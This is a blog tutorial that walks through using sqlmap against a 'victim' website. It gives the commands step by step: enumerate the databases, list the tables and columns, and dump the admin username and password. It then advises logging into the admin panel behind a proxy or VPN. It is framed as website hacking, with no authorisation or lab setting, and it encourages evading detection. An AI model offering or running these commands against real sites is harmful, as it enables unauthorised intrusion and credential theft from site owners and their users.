So you can check all my tutorial on backtrack here if you are a new visitor.
So come to today's topic Sqlmap is a automatic sql injection tool which helps you to hack vulnerable website easily.
Now to know more on it must have some idea on sql injection .
Now Follow these simple steps to know effective use of this tool.
![sql map](http://4.bp.blogspot.com/-6Dq5zQodMag/UYtkmiSIucI/AAAAAAAAEmY/-cx_uAAN9Ic/s520/1.png)
![sql map](http://4.bp.blogspot.com/-FUtQHzAPHxg/UYtl5QyETLI/AAAAAAAAEmk/37h3fFlvvWg/s420/2.png)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
![sql map tutorial](http://3.bp.blogspot.com/-Utr27W8PsUg/UYz_lvmoYqI/AAAAAAAAEm8/rpMRjoZBi9Y/s520/3.png)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
So in this case the command will be
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
![sql map tutorial](http://2.bp.blogspot.com/-wrLcf8PswiY/UY0AHjanWII/AAAAAAAAEnE/IO8ude4KYEM/s420/4.png)
![sql map tutorial](http://3.bp.blogspot.com/-8pOPMTof2_k/UY0AZZw9-JI/AAAAAAAAEnM/7LNKtbhSSoU/s920/5.png)
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
![sql map tutorial](http://4.bp.blogspot.com/-LbfzgX1lHhk/UY0BCQvYtjI/AAAAAAAAEnU/u0RqTelxeIg/s420/6.png)
Now we got the columns and we got username and password
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we have the username and the password of the website !
![sql map tutorial](http://1.bp.blogspot.com/-noFloJKcVmY/UY0BjthDY1I/AAAAAAAAEnc/tXrbXTeLUCc/s520/7.png)
Now All you have to do is just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
Thanks For Reading Stay Tuned for many such tutorials :)
Post a Comment
Feel Free To Ask Your Query we Love To Answer